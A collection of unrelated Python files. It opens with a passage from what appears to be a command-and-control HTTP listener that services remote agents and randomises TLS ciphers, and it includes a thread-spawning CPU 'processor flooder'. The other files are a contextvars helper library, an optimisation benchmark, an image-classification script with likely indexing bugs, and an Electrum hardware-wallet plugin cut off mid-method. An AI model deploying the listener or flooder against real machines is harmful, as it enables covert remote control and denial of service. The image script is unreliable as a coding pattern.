elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
                pyversion = sys.version_info
                # support any version of tls
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
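    # Cookie wire format (inferred from generate_launcher/handle_get above, noted for clarity):
    #
    #     Cookie: <name from generate_cookie()>=<base64-encoded RC4 routing packet>
    #
    # handle_get() matches self.session_cookie against the Cookie header and base64-decodes
    # everything after the first '=' to recover the routing packet.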
|
context_management.py
|
"""Tools for manual context management."""
import asyncio
from contextvars import Context, copy_context
from functools import partial, wraps
from typing import Callable, Coroutine, TypeVar
_ReturnT = TypeVar("_ReturnT")
def bind_to_snapshot_context(
fn: Callable[..., _ReturnT], *args, **kwargs
) -> Callable[..., _ReturnT]:
"""Take a snapshot of all context variables, and produce a function bound to the snapshot.
:returns: A modified function, that (on each call) restores context variables from the snapshot.
It acts like :func:`functools.partial`, but in addition, it freezes all context variables
to their current values. So the resulting function is always executed in a snapshot context.
Moreover, each call of the resulting function obtains its own isolated snapshot,
so you can call it multiple times safely.
This is useful when you want to produce a "frozen" callback,
protected from mutations of context variables, as illustrated in this example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_snapshot_context
>>> class CurrentVars(ContextVarsRegistry):
... user_id: int = None
>>> current = CurrentVars()
>>> def notify_current_user(message="some message"):
... print(f"notify user_id={current.user_id}: {message}")
>>> current.user_id = 1
>>> callback = bind_to_snapshot_context(notify_current_user)
# Callback is frozen, so modification of current.user_id doesn't affect the callback.
>>> current.user_id = 2
>>> callback()
notify user_id=1: some message
:func:`bind_to_snapshot_context` can be used in several ways:
- with ``lambda: ...`` expression
    - with args/kwargs (then it acts like :func:`functools.partial`)
- as a decorator
All forms work in the same way, you can choose one that you like::
>>> callbacks = []
# Lambda form, no args/kwargs.
>>> current.user_id = 1
>>> callbacks.append(
... bind_to_snapshot_context(lambda: notify_current_user(message="hello"))
... )
# When args/kwargs passed, it acts like functools.partial()
>>> current.user_id = 2
>>> callbacks.append(
... bind_to_snapshot_context(notify_current_user, message="hi")
... )
# Can also be used as a decorator.
>>> current.user_id = 42
>>> @bind_to_snapshot_context
... def _callback():
... notify_current_user(message="bonjour")
>>> callbacks.append(_callback)
# Execute accumulated callbacks.
# The current context has mutated several times, but that doesn't affect callbacks,
# because each callback has its own snapshot of all context variables.
>>> for callback in callbacks:
... callback()
notify user_id=1: hello
notify user_id=2: hi
notify user_id=42: bonjour
:func:`bind_to_snapshot_context` can also be helpful if you use threading
or Gevent (green threads).
The problem with threads (and greenlets in Gevent) is that they start in an empty context.
That is, you lose values of all context variables whenever you decide to offload
    a function to a background thread (or a Greenlet).
This is illustrated by the example below::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_snapshot_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> current.locale = 'nb'
>>> current.timezone = 'Antarctica/Troll'
>>> print_current_vars()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
# Run print_current_vars() in a background thread.
# Changes made to context variables above are not visible from inside the Thread.
# The Thread will see only default values, as if variables were never modified.
>>> import threading
>>> thread = threading.Thread(
... target=print_current_vars
... )
>>> thread.start()
{'timezone': 'UTC'}
This problem may be solved by wrapping your function with :func:`bind_to_snapshot_context`::
>>> print_current_vars2 = bind_to_snapshot_context(print_current_vars)
>>> thread = threading.Thread(
... target=bind_to_snapshot_context(print_current_vars)
... )
>>> thread.start()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
It also works with Gevent in the same way::
>>> import gevent
# Normally, Gevent spawns greenlets in empty context.
>>> greenlet = gevent.spawn(
... print_current_vars
... )
>>> greenlet.join()
{'timezone': 'UTC'}
# But, the context can be preserved by wrapping function with bind_to_snapshot_context()
>>> greenlet = gevent.spawn(
... bind_to_snapshot_context(print_current_vars)
... )
>>> greenlet.join()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
snapshot_ctx = copy_context()
@wraps(fn)
    def _wrapper__bind_to_snapshot_context(*args, **kwargs) -> _ReturnT:
        # Each function call receives its own isolated copy of the snapshot.
        # This may not always be what you want, but this is done due to the Principle of Least
        # Astonishment: if you spawn N threads, you don't want them to share a single context.
snapshot_ctx_copy = snapshot_ctx.copy()
return snapshot_ctx_copy.run(fn, *args, **kwargs)
return _wrapper__bind_to_snapshot_context
def bind_to_empty_context(fn: Callable[..., _ReturnT], *args, **kwargs) -> Callable[..., _ReturnT]:
"""Bind function to empty context.
:returns: A modified function, that always runs in an empty context,
where all context variables take their default values.
Example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_empty_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> current.locale = 'nb'
>>> current.timezone = 'Antarctica/Troll'
>>> print_current_vars()
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
>>> print_current_vars_in_empty_context = bind_to_empty_context(print_current_vars)
>>> print_current_vars_in_empty_context()
{'timezone': 'UTC'}
This may be useful if you want to "simulate" an empty state.
    For example, when you have an HTTP server, you sometimes want to build a "proxy" API
    that makes nested calls to other API endpoints. Those endpoints normally start in an empty
    context, but here they are invoked inside an existing API context, which leads to a conflict.
    To solve the problem, you may wrap the nested API calls with :func:`bind_to_empty_context`,
    and then they will run in an empty context, as if there were no parent API call.
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
@wraps(fn)
def _wrapper__bind_to_empty_context(*args, **kwargs) -> _ReturnT:
empty_context = Context()
return empty_context.run(fn, *args, **kwargs)
return _wrapper__bind_to_empty_context
def bind_to_sandbox_context(
fn: Callable[..., _ReturnT], *args, **kwargs
) -> Callable[..., _ReturnT]:
"""Modify function to copy context on each call.
:returns: a modified function, that copies context on each call.
This tool allows you to put a function into an isolated sandbox,
    where it can change context variables freely, without affecting the caller.
Changes made to context variables will be visible only inside the function call.
Once the function returns, all context variables are automatically restored to previous values.
Example::
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import bind_to_sandbox_context
>>> class CurrentVars(ContextVarsRegistry):
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> def print_current_vars():
... print(dict(current))
>>> @bind_to_sandbox_context
... def modify_and_print_current_vars():
... current.timezone = 'Antarctica/Troll'
... current.locale = 'en_US'
... print_current_vars()
>>> current.timezone = 'GMT'
>>> print_current_vars()
{'timezone': 'GMT'}
>>> modify_and_print_current_vars()
{'timezone': 'Antarctica/Troll', 'locale': 'en_US'}
>>> print_current_vars()
{'timezone': 'GMT'}
This is useful for batch processing, where you run N jobs in sequence, and you want to
put each job to a sandbox, where it can set context variables without affecting other jobs.
This is also useful for unit tests, where you need to isolate tests from each other.
Just decorate test with ``@bind_to_sandbox_context``, and then all changes made to context
variables become local to the test.
"""
# Use functools.partial() if args/kwargs passed.
fn = _partial(fn, *args, **kwargs)
@wraps(fn)
def _wrapper__bind_to_sandbox_context(*args, **kwargs) -> _ReturnT:
sandbox_context = copy_context()
return sandbox_context.run(fn, *args, **kwargs)
return _wrapper__bind_to_sandbox_context
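# A minimal sketch of the unit-test isolation use case mentioned in the
# bind_to_sandbox_context() docstring above. The _example_* names are hypothetical and only
# illustrate that changes made inside the sandboxed call do not leak to the caller.
from contextvars import ContextVar  # used only by the illustrative sketch below
_example_feature_flag = ContextVar("_example_feature_flag", default=False)
@bind_to_sandbox_context
def _example_sandboxed_test():
    _example_feature_flag.set(True)  # visible only inside this sandboxed call
    assert _example_feature_flag.get() is True
def _example_run_isolated_tests():
    _example_sandboxed_test()
    # The sandboxed call ran in a copy of the context, so the caller still sees the default.
    assert _example_feature_flag.get() is False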
def _partial(fn: Callable[..., _ReturnT], *args, **kwargs) -> Callable[..., _ReturnT]:
# This function behaves like functools.partial(),
    # except that it does NOT apply partial() and returns the function as-is if no arguments are provided.
    #
    # This is done to make debugging slightly nicer: the original function (without partial)
# just looks better in stack traces and print() statements.
#
# Also, there is a performance improvement, but it is minor, and can be neglected.
if args or kwargs:
fn = partial(fn, *args, **kwargs)
return fn
def create_async_task_in_empty_context(coro: Coroutine) -> asyncio.Task:
"""Create asyncio Task in empty context (where all context vars are set to default values).
By default, :mod:`asyncio` copies context whenever you create a new :class:`asyncio.Task`.
So, each Task inherits context variables from its parent Task.
This may not always be what you want.
Sometimes, you want to start a Task with an empty context.
So this :func:`create_async_task_in_empty_context` helper allows you to do that.
You just replace :func:`asyncio.create_task` with :func:`create_async_task_in_empty_context`,
    and you're done. The new task will ignore the parent's context and start with an empty context
    (where all context variables will take their default values).
Example::
>>> from asyncio import create_task, run
>>> from contextvars_extras import ContextVarsRegistry
>>> from contextvars_extras.context_management import create_async_task_in_empty_context
>>> class CurrentVars(ContextVarsRegistry):
... locale: str = 'en'
... timezone: str = 'UTC'
>>> current = CurrentVars()
>>> async def print_current_vars():
... print(dict(current))
>>> async def main():
... current.locale = 'nb'
... current.timezone = 'Antarctica/Troll'
...
... # Normally, if you call asyncio.create_task(), it copies the current context.
... # So, this print_current_vars() below should see locale/timezone values set above.
... await create_task(
... print_current_vars()
... )
...
... # But, if you use create_async_task_in_empty_context(), the new task will start with
... # an empty context (all context variables will take their default values).
... # So, print_current_vars() below should get only default values.
... await create_async_task_in_empty_context(
... print_current_vars()
... )
>>> run(main())
{'locale': 'nb', 'timezone': 'Antarctica/Troll'}
{'locale': 'en', 'timezone': 'UTC'}
"""
empty_context = Context()
task = empty_context.run(asyncio.create_task, coro)
return task
|
Procesor_Flooder.py
|
from random import randint
import colorama
import os
import threading
from threading import Lock
"""
github.com/Cloudzik1337
github.com/Cloudzik1337
github.com/Cloudzik1337
Processor flooder based on os.urandom().
I don't recommend going higher than 500 threads; it may freeze Windows.
I'm not responsible for how you use this code.
Feel free to edit the code, since it is very simple.
Please, if you copy the code, you can add credit.
"""
lock = Lock()
def save_print(*args, **kwargs):
with lock:
        print(*args, **kwargs)  # Prevent threads from printing on the same line
os.system('cls')
colorama.init(autoreset=True) #Auto reset color after new line
def autro():
print(colorama.Fore.GREEN + '''################################
# github.com/Cloudzik1337 #
################################
# Welcome to processor flooder #
################################''')
autro()
threads_amount = input(colorama.Fore.YELLOW + 'Enter number of threads $')
def work():
while True:
        string = os.urandom(randint(432544, 43242342)).hex()  # Generate a large block of random bytes and hex-encode it (CPU-intensive)
save_print(colorama.Fore.LIGHTYELLOW_EX + 'Generated '+colorama.Fore.RED+str(len(string))+colorama.Fore.RESET+colorama.Fore.YELLOW+' long string')
for _ in range(int(threads_amount)):
threading.Thread(target=work).start()
save_print('Activated', threading.active_count(), 'threads')
|
test_ISLO3.py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 00:03, 15/08/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
import multiprocessing
from pathlib import Path
from config import Config
from model import benchmark
from pandas import DataFrame
from time import time
from utils.IOUtil import save_results_to_csv
TRIALS = 20
PROBLEM_SIZE = 30
LB = [-100] * PROBLEM_SIZE
UB = [100] * PROBLEM_SIZE
VERBOSE = False
EPOCH = 1000
POP_SIZE = 50
LIST_FUNCTIONS = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12", "f13", "f14", "f15", "f16", "f17", "f18", "f19", "f20"]
def run_function(func_name):
algorithm_name = "ImprovedSLO"
path_error = f"{Config.BENCHMARK_ERROR}/{algorithm_name}/"
Path(path_error).mkdir(parents=True, exist_ok=True)
## Run model
error_full = {}
error_columns = []
for id_trial in range(TRIALS):
time_start = time()
md = getattr(benchmark, algorithm_name)(getattr(benchmark, func_name), LB, UB, VERBOSE, EPOCH, POP_SIZE)
_, best_fit, list_loss = md.train()
temp = f"trial_{str(id_trial)}"
error_full[temp] = list_loss
error_columns.append(temp)
time_end = time() - time_start
item = {'function': func_name, 'time': time_end, 'trial': id_trial, 'fit': best_fit}
save_results_to_csv(item, f"{PROBLEM_SIZE}D_{algorithm_name}_best_fit", Config.BENCHMARK_BEST_FIT)
df = DataFrame(error_full, columns=error_columns)
df.to_csv(f"{path_error}/{PROBLEM_SIZE}D_{algorithm_name}_{func_name}_error.csv", header=True, index=False)
if __name__ == '__main__':
starttime = time()
processes = []
for func in LIST_FUNCTIONS:
p = multiprocessing.Process(target=run_function, args=(func,))
processes.append(p)
p.start()
for process in processes:
process.join()
print('That took: {} seconds'.format(time() - starttime))
|
randomforestparallelthreading.py
|
import pandas as pd
import houghtest
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
import cv2
import numpy as np
import pickle
from multiprocessing import Process
import time
def thread1():
global h, w, trained_model, copy1
newcopy1 = copy1.copy()
    for y in range((h // 2) - 1):
        for c in range((w // 2) - 1):
b = newcopy1.item(y, c, 0)
g = newcopy1.item(y, c, 1)
r = newcopy1.item(y, c, 2)
bl = newcopy1.item(y, c - 1, 0)
gl = newcopy1.item(y, c - 1, 1)
rl = newcopy1.item(y, c - 1, 2)
br = newcopy1.item(y, c + 1, 0)
gr = newcopy1.item(y, c + 1, 1)
rr = newcopy1.item(y, c + 1, 2)
bu = newcopy1.item(y - 1, c, 0)
gu = newcopy1.item(y - 1, c, 1)
ru = newcopy1.item(y - 1, c, 2)
bul = newcopy1.item(y - 1, c - 1, 0)
gul = newcopy1.item(y - 1, c - 1, 1)
rul = newcopy1.item(y - 1, c - 1, 2)
bur = newcopy1.item(y - 1, c + 1, 0)
gur = newcopy1.item(y - 1, c + 1, 1)
rur = newcopy1.item(y - 1, c + 1, 2)
bdl = newcopy1.item(y + 1, c - 1, 0)
gdl = newcopy1.item(y + 1, c - 1, 1)
rdl = newcopy1.item(y + 1, c - 1, 2)
bdr = newcopy1.item(y + 1, c + 1, 0)
gdr = newcopy1.item(y + 1, c + 1, 1)
rdr = newcopy1.item(y + 1, c + 1, 2)
bd = newcopy1.item(y + 1, c, 0)
gd = newcopy1.item(y + 1, c, 1)
rd = newcopy1.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
copy1[y, c] = (255, 255, 0)
cv2.imwrite("copy1.png",copy1)
def thread2():
global h, w, trained_model, copy2
newcopy2 = copy2.copy()
    for y in range((h // 2) - 1):
        for c in range((w // 2) - 1):
b = newcopy2.item(y, c, 0)
g = newcopy2.item(y, c, 1)
r = newcopy2.item(y, c, 2)
bl = newcopy2.item(y, c - 1, 0)
gl = newcopy2.item(y, c - 1, 1)
rl = newcopy2.item(y, c - 1, 2)
br = newcopy2.item(y, c + 1, 0)
gr = newcopy2.item(y, c + 1, 1)
rr = newcopy2.item(y, c + 1, 2)
bu = newcopy2.item(y - 1, c, 0)
gu = newcopy2.item(y - 1, c, 1)
ru = newcopy2.item(y - 1, c, 2)
bul = newcopy2.item(y - 1, c - 1, 0)
gul = newcopy2.item(y - 1, c - 1, 1)
rul = newcopy2.item(y - 1, c - 1, 2)
bur = newcopy2.item(y - 1, c + 1, 0)
gur = newcopy2.item(y - 1, c + 1, 1)
rur = newcopy2.item(y - 1, c + 1, 2)
bdl = newcopy2.item(y + 1, c - 1, 0)
gdl = newcopy2.item(y + 1, c - 1, 1)
rdl = newcopy2.item(y + 1, c - 1, 2)
bdr = newcopy2.item(y + 1, c + 1, 0)
gdr = newcopy2.item(y + 1, c + 1, 1)
rdr = newcopy2.item(y + 1, c + 1, 2)
bd = newcopy2.item(y + 1, c, 0)
gd = newcopy2.item(y + 1, c, 1)
rd = newcopy2.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
                copy2[y, c - (w // 2)] = (255, 255, 0)
cv2.imwrite("copy2.png", copy2)
def thread3():
global h, w, trained_model, copy3
newcopy3 = copy3.copy()
    for y in range((h // 2) - 1):
        for c in range((w // 2) - 1):
b = newcopy3.item(y, c, 0)
g = newcopy3.item(y, c, 1)
r = newcopy3.item(y, c, 2)
bl = newcopy3.item(y, c - 1, 0)
gl = newcopy3.item(y, c - 1, 1)
rl = newcopy3.item(y, c - 1, 2)
br = newcopy3.item(y, c + 1, 0)
gr = newcopy3.item(y, c + 1, 1)
rr = newcopy3.item(y, c + 1, 2)
bu = newcopy3.item(y - 1, c, 0)
gu = newcopy3.item(y - 1, c, 1)
ru = newcopy3.item(y - 1, c, 2)
bul = newcopy3.item(y - 1, c - 1, 0)
gul = newcopy3.item(y - 1, c - 1, 1)
rul = newcopy3.item(y - 1, c - 1, 2)
bur = newcopy3.item(y - 1, c + 1, 0)
gur = newcopy3.item(y - 1, c + 1, 1)
rur = newcopy3.item(y - 1, c + 1, 2)
bdl = newcopy3.item(y + 1, c - 1, 0)
gdl = newcopy3.item(y + 1, c - 1, 1)
rdl = newcopy3.item(y + 1, c - 1, 2)
bdr = newcopy3.item(y + 1, c + 1, 0)
gdr = newcopy3.item(y + 1, c + 1, 1)
rdr = newcopy3.item(y + 1, c + 1, 2)
bd = newcopy3.item(y + 1, c, 0)
gd = newcopy3.item(y + 1, c, 1)
rd = newcopy3.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
                copy3[y - (h // 2), c] = (255, 255, 0)
cv2.imwrite("copy3.png", copy3)
def thread4():
global h, w, trained_model, copy4
newcopy4 = copy4.copy()
    for y in range((h // 2) - 1):
        for c in range((w // 2) - 1):
b = newcopy4.item(y, c, 0)
g = newcopy4.item(y, c, 1)
r = newcopy4.item(y, c, 2)
bl = newcopy4.item(y, c - 1, 0)
gl = newcopy4.item(y, c - 1, 1)
rl = newcopy4.item(y, c - 1, 2)
br = newcopy4.item(y, c + 1, 0)
gr = newcopy4.item(y, c + 1, 1)
rr = newcopy4.item(y, c + 1, 2)
bu = newcopy4.item(y - 1, c, 0)
gu = newcopy4.item(y - 1, c, 1)
ru = newcopy4.item(y - 1, c, 2)
bul = newcopy4.item(y - 1, c - 1, 0)
gul = newcopy4.item(y - 1, c - 1, 1)
rul = newcopy4.item(y - 1, c - 1, 2)
bur = newcopy4.item(y - 1, c + 1, 0)
gur = newcopy4.item(y - 1, c + 1, 1)
rur = newcopy4.item(y - 1, c + 1, 2)
bdl = newcopy4.item(y + 1, c - 1, 0)
gdl = newcopy4.item(y + 1, c - 1, 1)
rdl = newcopy4.item(y + 1, c - 1, 2)
bdr = newcopy4.item(y + 1, c + 1, 0)
gdr = newcopy4.item(y + 1, c + 1, 1)
rdr = newcopy4.item(y + 1, c + 1, 2)
bd = newcopy4.item(y + 1, c, 0)
gd = newcopy4.item(y + 1, c, 1)
rd = newcopy4.item(y + 1, c, 2)
new_prediction = trained_model.predict(np.array([[b, g, r, bl, gl, rl, br, gr, rr, bu, gu, ru, bul, gul, rul, bur, gur, rur, bdl, gdl, rdl, bdr, gdr, rdr, bd, gd, rd]]))
if new_prediction > 0.5:
                copy4[y - (h // 2), c - (w // 2)] = (255, 255, 0)
cv2.imwrite("copy4.png", copy4)
def main(img_path_or):
global trained_model, copy1, copy2, copy3, copy4, h, w
start = time.time()
print('Unpacking model')
trained_model = pickle.load(open("trained_model_25509_wo_verbose.sav",'rb'))
img = cv2.imread(img_path_or)
h, w = img.shape[:2]
    copy1 = img[0:(h // 2), 0:(w // 2)]
    copy2 = img[0:(h // 2), (w // 2):w]
    copy3 = img[(h // 2):h, 0:(w // 2)]
    copy4 = img[(h // 2):h, (w // 2):w]
    print('Processing')
p1 = Process(target=thread1)
p2 = Process(target=thread2)
p3 = Process(target=thread3)
p4 = Process(target=thread4)
p1.start()
p2.start()
p3.start()
p4.start()
p1.join()
p2.join()
p3.join()
p4.join()
out1 = np.zeros((320, 480, 3))
    out1[0:(h // 2), 0:(w // 2)] = cv2.imread('copy1.png')
    out1[0:(h // 2), (w // 2):w] = cv2.imread('copy2.png')
    out1[(h // 2):h, 0:(w // 2)] = cv2.imread('copy3.png')
    out1[(h // 2):h, (w // 2):w] = cv2.imread('copy4.png')
cv2.imwrite('images/out1.png', out1)
length = houghtest.main("images/out1.png",img_path_or)
print('finished')
end = time.time()
print('Took '+str(round(((end - start)/60), 2))+' mins to process')
return length
if __name__ == '__main__':
    import sys
    # The path of the image to process is expected as the first command-line argument.
    main(sys.argv[1])
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Verge"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
